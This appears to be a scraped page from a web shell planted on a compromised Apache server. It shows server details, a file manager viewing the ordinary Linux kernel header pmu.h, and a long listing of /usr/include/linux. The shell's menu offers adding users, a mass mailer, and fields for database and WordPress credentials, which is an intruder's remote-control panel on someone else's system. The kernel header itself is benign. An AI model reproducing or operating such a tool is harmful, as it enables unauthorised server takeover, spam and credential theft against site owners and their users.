System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
linux
/
216.73.216.141
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
pmu.h
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ /* * Definitions for talking to the PMU. The PMU is a microcontroller * which controls battery charging and system power on PowerBook 3400 * and 2400 models as well as the RTC and various other things. * * Copyright (C) 1998 Paul Mackerras. */ #ifndef _LINUX_PMU_H #define _LINUX_PMU_H #define PMU_DRIVER_VERSION 2 /* * PMU commands */ #define PMU_POWER_CTRL0 0x10 /* control power of some devices */ #define PMU_POWER_CTRL 0x11 /* control power of some devices */ #define PMU_ADB_CMD 0x20 /* send ADB packet */ #define PMU_ADB_POLL_OFF 0x21 /* disable ADB auto-poll */ #define PMU_WRITE_NVRAM 0x33 /* write non-volatile RAM */ #define PMU_READ_NVRAM 0x3b /* read non-volatile RAM */ #define PMU_SET_RTC 0x30 /* set real-time clock */ #define PMU_READ_RTC 0x38 /* read real-time clock */ #define PMU_SET_VOLBUTTON 0x40 /* set volume up/down position */ #define PMU_BACKLIGHT_BRIGHT 0x41 /* set backlight brightness */ #define PMU_GET_VOLBUTTON 0x48 /* get volume up/down position */ #define PMU_PCEJECT 0x4c /* eject PC-card from slot */ #define PMU_BATTERY_STATE 0x6b /* report battery state etc. */ #define PMU_SMART_BATTERY_STATE 0x6f /* report battery state (new way) */ #define PMU_SET_INTR_MASK 0x70 /* set PMU interrupt mask */ #define PMU_INT_ACK 0x78 /* read interrupt bits */ #define PMU_SHUTDOWN 0x7e /* turn power off */ #define PMU_CPU_SPEED 0x7d /* control CPU speed on some models */ #define PMU_SLEEP 0x7f /* put CPU to sleep */ #define PMU_POWER_EVENTS 0x8f /* Send power-event commands to PMU */ #define PMU_I2C_CMD 0x9a /* I2C operations */ #define PMU_RESET 0xd0 /* reset CPU */ #define PMU_GET_BRIGHTBUTTON 0xd9 /* report brightness up/down pos */ #define PMU_GET_COVER 0xdc /* report cover open/closed */ #define PMU_SYSTEM_READY 0xdf /* tell PMU we are awake */ #define PMU_GET_VERSION 0xea /* read the PMU version */ /* Bits to use with the PMU_POWER_CTRL0 command */ #define PMU_POW0_ON 0x80 /* OR this to power ON the device */ #define PMU_POW0_OFF 0x00 /* leave bit 7 to 0 to power it OFF */ #define PMU_POW0_HARD_DRIVE 0x04 /* Hard drive power (on wallstreet/lombard ?) */ /* Bits to use with the PMU_POWER_CTRL command */ #define PMU_POW_ON 0x80 /* OR this to power ON the device */ #define PMU_POW_OFF 0x00 /* leave bit 7 to 0 to power it OFF */ #define PMU_POW_BACKLIGHT 0x01 /* backlight power */ #define PMU_POW_CHARGER 0x02 /* battery charger power */ #define PMU_POW_IRLED 0x04 /* IR led power (on wallstreet) */ #define PMU_POW_MEDIABAY 0x08 /* media bay power (wallstreet/lombard ?) */ /* Bits in PMU interrupt and interrupt mask bytes */ #define PMU_INT_PCEJECT 0x04 /* PC-card eject buttons */ #define PMU_INT_SNDBRT 0x08 /* sound/brightness up/down buttons */ #define PMU_INT_ADB 0x10 /* ADB autopoll or reply data */ #define PMU_INT_BATTERY 0x20 /* Battery state change */ #define PMU_INT_ENVIRONMENT 0x40 /* Environment interrupts */ #define PMU_INT_TICK 0x80 /* 1-second tick interrupt */ /* Other bits in PMU interrupt valid when PMU_INT_ADB is set */ #define PMU_INT_ADB_AUTO 0x04 /* ADB autopoll, when PMU_INT_ADB */ #define PMU_INT_WAITING_CHARGER 0x01 /* ??? */ #define PMU_INT_AUTO_SRQ_POLL 0x02 /* ??? */ /* Bits in the environement message (either obtained via PMU_GET_COVER, * or via PMU_INT_ENVIRONMENT on core99 */ #define PMU_ENV_LID_CLOSED 0x01 /* The lid is closed */ /* I2C related definitions */ #define PMU_I2C_MODE_SIMPLE 0 #define PMU_I2C_MODE_STDSUB 1 #define PMU_I2C_MODE_COMBINED 2 #define PMU_I2C_BUS_STATUS 0 #define PMU_I2C_BUS_SYSCLK 1 #define PMU_I2C_BUS_POWER 2 #define PMU_I2C_STATUS_OK 0 #define PMU_I2C_STATUS_DATAREAD 1 #define PMU_I2C_STATUS_BUSY 0xfe /* Kind of PMU (model) */ enum { PMU_UNKNOWN, PMU_OHARE_BASED, /* 2400, 3400, 3500 (old G3 powerbook) */ PMU_HEATHROW_BASED, /* PowerBook G3 series */ PMU_PADDINGTON_BASED, /* 1999 PowerBook G3 */ PMU_KEYLARGO_BASED, /* Core99 motherboard (PMU99) */ PMU_68K_V1, /* 68K PMU, version 1 */ PMU_68K_V2, /* 68K PMU, version 2 */ }; /* PMU PMU_POWER_EVENTS commands */ enum { PMU_PWR_GET_POWERUP_EVENTS = 0x00, PMU_PWR_SET_POWERUP_EVENTS = 0x01, PMU_PWR_CLR_POWERUP_EVENTS = 0x02, PMU_PWR_GET_WAKEUP_EVENTS = 0x03, PMU_PWR_SET_WAKEUP_EVENTS = 0x04, PMU_PWR_CLR_WAKEUP_EVENTS = 0x05, }; /* Power events wakeup bits */ enum { PMU_PWR_WAKEUP_KEY = 0x01, /* Wake on key press */ PMU_PWR_WAKEUP_AC_INSERT = 0x02, /* Wake on AC adapter plug */ PMU_PWR_WAKEUP_AC_CHANGE = 0x04, PMU_PWR_WAKEUP_LID_OPEN = 0x08, PMU_PWR_WAKEUP_RING = 0x10, }; /* * Ioctl commands for the /dev/pmu device */ #include <linux/ioctl.h> /* no param */ #define PMU_IOC_SLEEP _IO('B', 0) /* out param: u32* backlight value: 0 to 15 */ #define PMU_IOC_GET_BACKLIGHT _IOR('B', 1, size_t) /* in param: u32 backlight value: 0 to 15 */ #define PMU_IOC_SET_BACKLIGHT _IOW('B', 2, size_t) /* out param: u32* PMU model */ #define PMU_IOC_GET_MODEL _IOR('B', 3, size_t) /* out param: u32* has_adb: 0 or 1 */ #define PMU_IOC_HAS_ADB _IOR('B', 4, size_t) /* out param: u32* can_sleep: 0 or 1 */ #define PMU_IOC_CAN_SLEEP _IOR('B', 5, size_t) /* no param, but historically was _IOR('B', 6, 0), meaning 4 bytes */ #define PMU_IOC_GRAB_BACKLIGHT _IOR('B', 6, size_t) #endif /* _LINUX_PMU_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
..
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
android
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
byteorder
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
caif
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
can
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
cifs
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
dvb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
genwqe
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hdlc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
hsi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
iio
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
isdn
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
mmc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_arp
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_bridge
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv4
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
netfilter_ipv6
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
nfsd
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
raid
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sched
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
spi
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
sunrpc
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_act
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
tc_ematch
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
usb
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
wimax
DIR
-
drwxr-xr-x
2025-12-09 11:00:19
a.out.h
text/x-c
6.73 KB
-rw-r--r--
2025-12-08 09:06:43
acct.h
text/x-c
3.65 KB
-rw-r--r--
2025-12-08 09:06:42
adb.h
text/x-c
1.11 KB
-rw-r--r--
2025-12-08 09:06:42
adfs_fs.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
affs_hardblocks.h
text/x-c
1.51 KB
-rw-r--r--
2025-12-08 09:06:40
agpgart.h
text/x-c
3.85 KB
-rw-r--r--
2025-12-08 09:06:41
aio_abi.h
text/x-c
3.34 KB
-rw-r--r--
2025-12-08 09:06:42
am437x-vpfe.h
text/x-c
3.59 KB
-rw-r--r--
2025-12-08 09:06:43
apm_bios.h
text/x-c
3.6 KB
-rw-r--r--
2025-12-08 09:06:43
arcfb.h
text/x-c
213 B
-rw-r--r--
2025-12-08 09:06:42
arm_sdei.h
text/x-c
2.69 KB
-rw-r--r--
2025-12-08 09:06:42
aspeed-lpc-ctrl.h
text/x-c
1.74 KB
-rw-r--r--
2025-12-08 09:06:41
atalk.h
text/x-c
1023 B
-rw-r--r--
2025-12-08 09:06:41
atm.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:40
atm_eni.h
text/x-c
648 B
-rw-r--r--
2025-12-08 09:06:40
atm_he.h
text/x-c
406 B
-rw-r--r--
2025-12-08 09:06:41
atm_idt77105.h
text/x-c
955 B
-rw-r--r--
2025-12-08 09:06:43
atm_nicstar.h
text/x-c
1.25 KB
-rw-r--r--
2025-12-08 09:06:40
atm_tcp.h
text/x-c
1.58 KB
-rw-r--r--
2025-12-08 09:06:42
atm_zatm.h
text/x-c
1.5 KB
-rw-r--r--
2025-12-08 09:06:41
atmapi.h
text/x-c
952 B
-rw-r--r--
2025-12-08 09:06:42
atmarp.h
text/x-c
1.27 KB
-rw-r--r--
2025-12-08 09:06:41
atmbr2684.h
text/x-c
3.19 KB
-rw-r--r--
2025-12-08 09:06:43
atmclip.h
text/x-c
576 B
-rw-r--r--
2025-12-08 09:06:40
atmdev.h
text/x-c
7.5 KB
-rw-r--r--
2025-12-08 09:06:43
atmioc.h
text/x-c
1.61 KB
-rw-r--r--
2025-12-08 09:06:41
atmlec.h
text/x-c
2.33 KB
-rw-r--r--
2025-12-08 09:06:41
atmmpc.h
text/x-c
4.13 KB
-rw-r--r--
2025-12-08 09:06:40
atmppp.h
text/x-c
639 B
-rw-r--r--
2025-12-08 09:06:42
atmsap.h
text/x-c
4.85 KB
-rw-r--r--
2025-12-08 09:06:41
atmsvc.h
text/x-c
1.81 KB
-rw-r--r--
2025-12-08 09:06:42
audit.h
text/x-c
19.92 KB
-rw-r--r--
2025-12-08 09:06:40
auto_dev-ioctl.h
text/x-c
4.87 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs.h
text/x-c
6.28 KB
-rw-r--r--
2025-12-08 09:06:42
auto_fs4.h
text/x-c
451 B
-rw-r--r--
2025-12-08 09:06:42
auxvec.h
text/x-c
1.56 KB
-rw-r--r--
2025-12-08 09:06:41
ax25.h
text/x-c
2.76 KB
-rw-r--r--
2025-12-08 09:06:43
b1lli.h
text/x-c
1.68 KB
-rw-r--r--
2025-12-08 09:06:41
batadv_packet.h
text/x-c
20.01 KB
-rw-r--r--
2025-12-08 09:06:41
batman_adv.h
text/x-c
11.7 KB
-rw-r--r--
2025-12-08 09:06:42
baycom.h
text/x-c
883 B
-rw-r--r--
2025-12-08 09:06:42
bcache.h
text/x-c
8.17 KB
-rw-r--r--
2025-12-08 09:06:41
bcm933xx_hcs.h
text/x-c
419 B
-rw-r--r--
2025-12-08 09:06:43
bfs_fs.h
text/x-c
1.85 KB
-rw-r--r--
2025-12-08 09:06:41
binfmts.h
text/x-c
628 B
-rw-r--r--
2025-12-08 09:06:40
blkpg.h
text/x-c
904 B
-rw-r--r--
2025-12-08 09:06:43
blktrace_api.h
text/x-c
4.59 KB
-rw-r--r--
2025-12-08 09:06:40
blkzoned.h
text/x-c
6.45 KB
-rw-r--r--
2025-12-08 09:06:42
bpf.h
text/x-c
223.3 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_common.h
text/x-c
1.33 KB
-rw-r--r--
2025-12-08 09:06:42
bpf_perf_event.h
text/x-c
529 B
-rw-r--r--
2025-12-08 09:06:42
bpfilter.h
text/x-c
465 B
-rw-r--r--
2025-12-08 09:06:41
bpqether.h
text/x-c
981 B
-rw-r--r--
2025-12-08 09:06:42
bsg.h
text/x-c
2.44 KB
-rw-r--r--
2025-12-08 09:06:42
bt-bmc.h
text/x-c
572 B
-rw-r--r--
2025-12-08 09:06:42
btf.h
text/x-c
4.68 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs.h
text/x-c
28.24 KB
-rw-r--r--
2025-12-08 09:06:42
btrfs_tree.h
text/x-c
24.69 KB
-rw-r--r--
2025-12-08 09:06:41
can.h
text/x-c
7.7 KB
-rw-r--r--
2025-12-08 09:06:41
capability.h
text/x-c
13.2 KB
-rw-r--r--
2025-12-08 09:06:41
capi.h
text/x-c
3.05 KB
-rw-r--r--
2025-12-08 09:06:40
cciss_defs.h
text/x-c
3.2 KB
-rw-r--r--
2025-12-08 09:06:42
cciss_ioctl.h
text/x-c
2.7 KB
-rw-r--r--
2025-12-08 09:06:42
cdrom.h
text/x-c
28.18 KB
-rw-r--r--
2025-12-08 09:06:41
cec-funcs.h
text/x-c
52.64 KB
-rw-r--r--
2025-12-08 09:06:42
cec.h
text/x-c
36.81 KB
-rw-r--r--
2025-12-08 09:06:42
cfm_bridge.h
text/x-c
1.42 KB
-rw-r--r--
2025-12-08 09:06:43
cgroupstats.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:41
chio.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:43
close_range.h
text/x-c
377 B
-rw-r--r--
2025-12-08 09:06:42
cm4000_cs.h
text/x-c
1.76 KB
-rw-r--r--
2025-12-08 09:06:43
cn_proc.h
text/x-c
3.38 KB
-rw-r--r--
2025-12-08 09:06:42
coda.h
text/x-c
17.09 KB
-rw-r--r--
2025-12-08 09:06:42
coda_psdev.h
text/x-c
783 B
-rw-r--r--
2025-12-08 09:06:42
coff.h
text/x-c
12.18 KB
-rw-r--r--
2025-12-08 09:06:40
connector.h
text/x-c
2.2 KB
-rw-r--r--
2025-12-08 09:06:41
const.h
text/x-c
788 B
-rw-r--r--
2025-12-08 09:06:40
coresight-stm.h
text/x-c
674 B
-rw-r--r--
2025-12-08 09:06:42
cramfs_fs.h
text/x-c
3.47 KB
-rw-r--r--
2025-12-08 09:06:42
cryptouser.h
text/x-c
3.31 KB
-rw-r--r--
2025-12-08 09:06:41
cuda.h
text/x-c
905 B
-rw-r--r--
2025-12-08 09:06:42
cyclades.h
text/x-c
16.71 KB
-rw-r--r--
2025-12-08 09:06:41
cycx_cfm.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:42
dcbnl.h
text/x-c
24.65 KB
-rw-r--r--
2025-12-08 09:06:41
dccp.h
text/x-c
6.29 KB
-rw-r--r--
2025-12-08 09:06:41
devlink.h
text/x-c
21.05 KB
-rw-r--r--
2025-12-08 09:06:41
dlm.h
text/x-c
2.49 KB
-rw-r--r--
2025-12-08 09:06:41
dlm_device.h
text/x-c
2.48 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_netlink.h
text/x-c
1.13 KB
-rw-r--r--
2025-12-08 09:06:42
dlm_plock.h
text/x-c
894 B
-rw-r--r--
2025-12-08 09:06:42
dlmconstants.h
text/x-c
4.96 KB
-rw-r--r--
2025-12-08 09:06:43
dm-ioctl.h
text/x-c
11.13 KB
-rw-r--r--
2025-12-08 09:06:42
dm-log-userspace.h
text/x-c
14.83 KB
-rw-r--r--
2025-12-08 09:06:41
dma-buf.h
text/x-c
5.12 KB
-rw-r--r--
2025-12-08 09:06:41
dn.h
text/x-c
4.53 KB
-rw-r--r--
2025-12-08 09:06:41
dqblk_xfs.h
text/x-c
9.03 KB
-rw-r--r--
2025-12-08 09:06:41
edd.h
text/x-c
5.47 KB
-rw-r--r--
2025-12-08 09:06:42
efs_fs_sb.h
text/x-c
2.17 KB
-rw-r--r--
2025-12-08 09:06:42
elf-em.h
text/x-c
2.14 KB
-rw-r--r--
2025-12-08 09:06:41
elf-fdpic.h
text/x-c
1.1 KB
-rw-r--r--
2025-12-08 09:06:42
elf.h
text/x-c
13.16 KB
-rw-r--r--
2025-12-08 09:06:41
elfcore.h
text/x-c
2.92 KB
-rw-r--r--
2025-12-08 09:06:41
errno.h
text/x-c
23 B
-rw-r--r--
2025-12-08 09:06:42
errqueue.h
text/x-c
1.44 KB
-rw-r--r--
2025-12-08 09:06:42
erspan.h
text/x-c
1.03 KB
-rw-r--r--
2025-12-08 09:06:41
ethtool.h
text/x-c
81.89 KB
-rw-r--r--
2025-12-08 09:06:42
ethtool_netlink.h
text/x-c
22.29 KB
-rw-r--r--
2025-12-08 09:06:42
eventpoll.h
text/x-c
2.67 KB
-rw-r--r--
2025-12-08 09:06:41
fadvise.h
text/x-c
842 B
-rw-r--r--
2025-12-08 09:06:40
falloc.h
text/x-c
3.5 KB
-rw-r--r--
2025-12-08 09:06:42
fanotify.h
text/x-c
5.22 KB
-rw-r--r--
2025-12-08 09:06:40
fb.h
text/x-c
16.09 KB
-rw-r--r--
2025-12-08 09:06:42
fcntl.h
text/x-c
4.08 KB
-rw-r--r--
2025-12-08 09:06:43
fd.h
text/x-c
11.4 KB
-rw-r--r--
2025-12-08 09:06:41
fdreg.h
text/x-c
5.29 KB
-rw-r--r--
2025-12-08 09:06:41
fib_rules.h
text/x-c
1.99 KB
-rw-r--r--
2025-12-08 09:06:40
fiemap.h
text/x-c
2.71 KB
-rw-r--r--
2025-12-08 09:06:41
filter.h
text/x-c
2.16 KB
-rw-r--r--
2025-12-08 09:06:43
firewire-cdev.h
text/x-c
42.86 KB
-rw-r--r--
2025-12-08 09:06:41
firewire-constants.h
text/x-c
3.16 KB
-rw-r--r--
2025-12-08 09:06:41
flat.h
text/x-c
2.1 KB
-rw-r--r--
2025-12-08 09:06:41
fou.h
text/x-c
694 B
-rw-r--r--
2025-12-08 09:06:42
fpga-dfl.h
text/x-c
8.52 KB
-rw-r--r--
2025-12-08 09:06:43
fs.h
text/x-c
13.11 KB
-rw-r--r--
2025-12-08 09:06:42
fsl_hypervisor.h
text/x-c
7.13 KB
-rw-r--r--
2025-12-08 09:06:42
fsmap.h
text/x-c
4.29 KB
-rw-r--r--
2025-12-08 09:06:42
fuse.h
text/x-c
22.92 KB
-rw-r--r--
2025-12-08 09:06:41
futex.h
text/x-c
4.88 KB
-rw-r--r--
2025-12-08 09:06:43
gameport.h
text/x-c
897 B
-rw-r--r--
2025-12-08 09:06:42
gen_stats.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:42
genetlink.h
text/x-c
2.12 KB
-rw-r--r--
2025-12-08 09:06:42
gfs2_ondisk.h
text/x-c
14.4 KB
-rw-r--r--
2025-12-08 09:06:41
gigaset_dev.h
text/x-c
1.41 KB
-rw-r--r--
2025-12-08 09:06:41
gpio.h
text/x-c
6.59 KB
-rw-r--r--
2025-12-08 09:06:42
gsmmux.h
text/x-c
1.02 KB
-rw-r--r--
2025-12-08 09:06:40
gtp.h
text/x-c
681 B
-rw-r--r--
2025-12-08 09:06:41
hash_info.h
text/x-c
921 B
-rw-r--r--
2025-12-08 09:06:42
hdlc.h
text/x-c
637 B
-rw-r--r--
2025-12-08 09:06:42
hdlcdrv.h
text/x-c
2.84 KB
-rw-r--r--
2025-12-08 09:06:41
hdreg.h
text/x-c
22.17 KB
-rw-r--r--
2025-12-08 09:06:41
hid.h
text/x-c
1.86 KB
-rw-r--r--
2025-12-08 09:06:41
hiddev.h
text/x-c
6.2 KB
-rw-r--r--
2025-12-08 09:06:42
hidraw.h
text/x-c
1.95 KB
-rw-r--r--
2025-12-08 09:06:41
hpet.h
text/x-c
743 B
-rw-r--r--
2025-12-08 09:06:41
hsr_netlink.h
text/x-c
1.06 KB
-rw-r--r--
2025-12-08 09:06:43
hw_breakpoint.h
text/x-c
742 B
-rw-r--r--
2025-12-08 09:06:42
hyperv.h
text/x-c
10.89 KB
-rw-r--r--
2025-12-08 09:06:42
hysdn_if.h
text/plain
1.35 KB
-rw-r--r--
2025-12-08 09:06:42
i2c-dev.h
text/x-c
2.55 KB
-rw-r--r--
2025-12-08 09:06:42
i2c.h
text/x-c
6.96 KB
-rw-r--r--
2025-12-08 09:06:42
i2o-dev.h
text/x-c
11.28 KB
-rw-r--r--
2025-12-08 09:06:41
i8k.h
text/x-c
1.49 KB
-rw-r--r--
2025-12-08 09:06:43
icmp.h
text/x-c
2.91 KB
-rw-r--r--
2025-12-08 09:06:41
icmpv6.h
text/x-c
3.94 KB
-rw-r--r--
2025-12-08 09:06:43
idxd.h
text/x-c
8.22 KB
-rw-r--r--
2025-12-08 09:06:40
if.h
text/x-c
10.65 KB
-rw-r--r--
2025-12-08 09:06:41
if_addr.h
text/x-c
1.84 KB
-rw-r--r--
2025-12-08 09:06:41
if_addrlabel.h
text/x-c
721 B
-rw-r--r--
2025-12-08 09:06:42
if_alg.h
text/x-c
946 B
-rw-r--r--
2025-12-08 09:06:41
if_arcnet.h
text/x-c
3.63 KB
-rw-r--r--
2025-12-08 09:06:42
if_arp.h
text/x-c
6.42 KB
-rw-r--r--
2025-12-08 09:06:41
if_bonding.h
text/x-c
5.17 KB
-rw-r--r--
2025-12-08 09:06:41
if_bridge.h
text/x-c
19.06 KB
-rw-r--r--
2025-12-08 09:06:42
if_cablemodem.h
text/x-c
986 B
-rw-r--r--
2025-12-08 09:06:42
if_eql.h
text/x-c
1.32 KB
-rw-r--r--
2025-12-08 09:06:41
if_ether.h
text/x-c
8.05 KB
-rw-r--r--
2025-12-08 09:06:41
if_fc.h
text/x-c
1.7 KB
-rw-r--r--
2025-12-08 09:06:43
if_fddi.h
text/x-c
3.66 KB
-rw-r--r--
2025-12-08 09:06:42
if_frad.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:41
if_hippi.h
text/x-c
4.14 KB
-rw-r--r--
2025-12-08 09:06:40
if_infiniband.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:43
if_link.h
text/x-c
30.28 KB
-rw-r--r--
2025-12-08 09:06:42
if_ltalk.h
text/x-c
210 B
-rw-r--r--
2025-12-08 09:06:41
if_macsec.h
text/x-c
5.7 KB
-rw-r--r--
2025-12-08 09:06:41
if_packet.h
text/x-c
7.73 KB
-rw-r--r--
2025-12-08 09:06:42
if_phonet.h
text/x-c
424 B
-rw-r--r--
2025-12-08 09:06:41
if_plip.h
text/x-c
660 B
-rw-r--r--
2025-12-08 09:06:41
if_ppp.h
text/x-c
29 B
-rw-r--r--
2025-12-08 09:06:41
if_pppol2tp.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:41
if_pppox.h
text/x-c
4.76 KB
-rw-r--r--
2025-12-08 09:06:41
if_slip.h
text/x-c
872 B
-rw-r--r--
2025-12-08 09:06:42
if_team.h
text/x-c
2.54 KB
-rw-r--r--
2025-12-08 09:06:41
if_tun.h
text/x-c
4 KB
-rw-r--r--
2025-12-08 09:06:41
if_tunnel.h
text/x-c
4.41 KB
-rw-r--r--
2025-12-08 09:06:41
if_vlan.h
text/x-c
1.79 KB
-rw-r--r--
2025-12-08 09:06:41
if_x25.h
text/x-c
881 B
-rw-r--r--
2025-12-08 09:06:43
if_xdp.h
text/x-c
2.94 KB
-rw-r--r--
2025-12-08 09:06:43
ife.h
text/x-c
351 B
-rw-r--r--
2025-12-08 09:06:41
igmp.h
text/x-c
2.99 KB
-rw-r--r--
2025-12-08 09:06:41
ila.h
text/x-c
1.22 KB
-rw-r--r--
2025-12-08 09:06:41
in.h
text/x-c
9.78 KB
-rw-r--r--
2025-12-08 09:06:41
in6.h
text/x-c
7.26 KB
-rw-r--r--
2025-12-08 09:06:42
in_route.h
text/x-c
936 B
-rw-r--r--
2025-12-08 09:06:43
inet_diag.h
text/x-c
4.56 KB
-rw-r--r--
2025-12-08 09:06:40
inotify.h
text/x-c
3.21 KB
-rw-r--r--
2025-12-08 09:06:42
input-event-codes.h
text/x-c
27.94 KB
-rw-r--r--
2025-12-08 09:06:42
input.h
text/x-c
15.61 KB
-rw-r--r--
2025-12-08 09:06:42
io_uring.h
text/x-c
6.06 KB
-rw-r--r--
2025-12-08 09:06:41
ioctl.h
text/x-c
163 B
-rw-r--r--
2025-12-08 09:06:41
iommu.h
text/x-c
4.79 KB
-rw-r--r--
2025-12-08 09:06:43
ip.h
text/x-c
4.62 KB
-rw-r--r--
2025-12-08 09:06:43
ip6_tunnel.h
text/x-c
1.91 KB
-rw-r--r--
2025-12-08 09:06:41
ip_vs.h
text/x-c
13.31 KB
-rw-r--r--
2025-12-08 09:06:42
ipc.h
text/x-c
2.05 KB
-rw-r--r--
2025-12-08 09:06:42
ipmi.h
text/x-c
15.08 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_bmc.h
text/x-c
464 B
-rw-r--r--
2025-12-08 09:06:42
ipmi_msgdefs.h
text/x-c
3.35 KB
-rw-r--r--
2025-12-08 09:06:41
ipmi_ssif_bmc.h
text/x-c
441 B
-rw-r--r--
2025-12-08 09:06:40
ipsec.h
text/x-c
947 B
-rw-r--r--
2025-12-08 09:06:43
ipv6.h
text/x-c
3.87 KB
-rw-r--r--
2025-12-08 09:06:40
ipv6_route.h
text/x-c
1.86 KB
-rw-r--r--
2025-12-08 09:06:42
ipx.h
text/x-c
2.29 KB
-rw-r--r--
2025-12-08 09:06:42
irqnr.h
text/plain
104 B
-rw-r--r--
2025-12-08 09:06:40
isdn.h
text/x-c
5.64 KB
-rw-r--r--
2025-12-08 09:06:41
isdn_divertif.h
text/x-c
1.17 KB
-rw-r--r--
2025-12-08 09:06:42
isdn_ppp.h
text/x-c
1.88 KB
-rw-r--r--
2025-12-08 09:06:42
isdnif.h
text/x-c
2.31 KB
-rw-r--r--
2025-12-08 09:06:40
iso_fs.h
text/x-c
6.33 KB
-rw-r--r--
2025-12-08 09:06:41
isst_if.h
text/x-c
5.26 KB
-rw-r--r--
2025-12-08 09:06:41
ivtv.h
text/x-c
2.95 KB
-rw-r--r--
2025-12-08 09:06:41
ivtvfb.h
text/x-c
1.18 KB
-rw-r--r--
2025-12-08 09:06:41
jffs2.h
text/x-c
6.85 KB
-rw-r--r--
2025-12-08 09:06:41
joystick.h
text/x-c
3.35 KB
-rw-r--r--
2025-12-08 09:06:42
kcm.h
text/x-c
822 B
-rw-r--r--
2025-12-08 09:06:41
kcmp.h
text/x-c
522 B
-rw-r--r--
2025-12-08 09:06:42
kcov.h
text/x-c
1.07 KB
-rw-r--r--
2025-12-08 09:06:42
kd.h
text/x-c
6.11 KB
-rw-r--r--
2025-12-08 09:06:42
kdev_t.h
text/x-c
383 B
-rw-r--r--
2025-12-08 09:06:42
kernel-page-flags.h
text/x-c
900 B
-rw-r--r--
2025-12-08 09:06:41
kernel.h
text/x-c
438 B
-rw-r--r--
2025-12-08 09:06:41
kernelcapi.h
text/x-c
1019 B
-rw-r--r--
2025-12-08 09:06:43
kexec.h
text/x-c
1.79 KB
-rw-r--r--
2025-12-08 09:06:42
keyboard.h
text/x-c
12.48 KB
-rw-r--r--
2025-12-08 09:06:41
keyctl.h
text/x-c
3.42 KB
-rw-r--r--
2025-12-08 09:06:43
kfd_ioctl.h
text/x-c
28.14 KB
-rw-r--r--
2025-12-08 09:06:41
kfd_sysfs.h
text/x-c
4.25 KB
-rw-r--r--
2025-12-08 09:06:40
kvm.h
text/x-c
60.12 KB
-rw-r--r--
2025-12-08 09:06:41
kvm_para.h
text/x-c
1001 B
-rw-r--r--
2025-12-08 09:06:42
l2tp.h
text/x-c
5.46 KB
-rw-r--r--
2025-12-08 09:06:43
libc-compat.h
text/x-c
8.09 KB
-rw-r--r--
2025-12-08 09:06:42
lightnvm.h
text/x-c
4.92 KB
-rw-r--r--
2025-12-08 09:06:42
limits.h
text/x-c
937 B
-rw-r--r--
2025-12-08 09:06:41
lirc.h
text/x-c
7.63 KB
-rw-r--r--
2025-12-08 09:06:42
llc.h
text/x-c
3.09 KB
-rw-r--r--
2025-12-08 09:06:40
loop.h
text/x-c
3.42 KB
-rw-r--r--
2025-12-08 09:06:41
lp.h
text/x-c
4.09 KB
-rw-r--r--
2025-12-08 09:06:43
lwtunnel.h
text/x-c
2.13 KB
-rw-r--r--
2025-12-08 09:06:41
magic.h
text/x-c
3.45 KB
-rw-r--r--
2025-12-08 09:06:41
major.h
text/x-c
4.6 KB
-rw-r--r--
2025-12-08 09:06:41
map_to_7segment.h
text/x-c
7.08 KB
-rw-r--r--
2025-12-08 09:06:40
matroxfb.h
text/x-c
1.43 KB
-rw-r--r--
2025-12-08 09:06:42
max2175.h
text/x-c
1.01 KB
-rw-r--r--
2025-12-08 09:06:42
mdio.h
text/x-c
16.87 KB
-rw-r--r--
2025-12-08 09:06:41
media-bus-format.h
text/x-c
6.26 KB
-rw-r--r--
2025-12-08 09:06:41
media.h
text/x-c
11.12 KB
-rw-r--r--
2025-12-08 09:06:41
mei.h
text/x-c
3.39 KB
-rw-r--r--
2025-12-08 09:06:41
